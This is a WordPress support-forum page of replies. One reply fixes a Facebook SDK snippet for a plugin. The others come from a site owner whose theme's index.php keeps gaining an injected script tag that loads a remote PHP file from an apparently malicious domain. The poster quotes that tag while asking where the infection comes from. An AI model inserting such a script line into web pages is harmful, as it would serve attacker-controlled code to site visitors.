Forum Replies Created

Viewing 7 replies - 1 through 7 (of 7 total)
  • After confiming that I had the wp_head hook and language attributes in place, the plugin still wasnt working for me on any browsers… Then on the 3door’s site I noticed this:

    Facebook Javascript SDK:
    In the plugin, this is inserted just before </body>. Technically, it is best to insert this directly after <body>, changing YOUR_APP_ID to your App ID:
    <div id=”fb-root”></div>
    <script>(function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)) {return;}
    js = d.createElement(s); js.id = id;
    js.src = “//connect.facebook.net/en_US/all.js#xfbml=1&appId=YOUR_APP_ID”;
    fjs.parentNode.insertBefore(js, fjs);
    }(document, ‘script’, ‘facebook-jssdk’));</script>ent.getElementById(‘fb-root’).appendChild(e);
    }());
    </script>

    The wording originally led me to believe this wasn’t necessary for some reason, and there is some sort of typo at the end which farted some javascript text on to the page, but after I tidied that up, the plugin started working! Hope this helps someone…

    Thanks for the cool plugin Alex…

    I am having the exact same issue- after the post it only shows

    Comments
    Comment

    AFAIK the App ID is set up correctly and I’ve tried the two namespace checkboxes. What could be the limitation imposed by my theme? I made it from scratch.

    Thank you, I love your plugins and recommend TwitterFeedPro to my clients all the time!
    Cooper

    Thread Starter mistercooper

    (@mistercooper)

    The latest line is <script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme’s index.

    Thread Starter mistercooper

    (@mistercooper)

    This is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the

    <script type="text/javascript" src="redacted"></script>

    popped up. Both times it was the first line of index.php in the theme file.

    Thread Starter mistercooper

    (@mistercooper)

    @jzn21, I don’t think we have any plug ins or even wordpress version in common.

    Thread Starter mistercooper

    (@mistercooper)

    Can you elaborate just a little bit on which file you found the script link in? I’m having trouble locating it.

    Thanks
    Cooper

    Thread Starter mistercooper

    (@mistercooper)

    Thank you, I will look there!

    Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I’m wondering if this is still a vulnerability in the latest version.

Viewing 7 replies - 1 through 7 (of 7 total)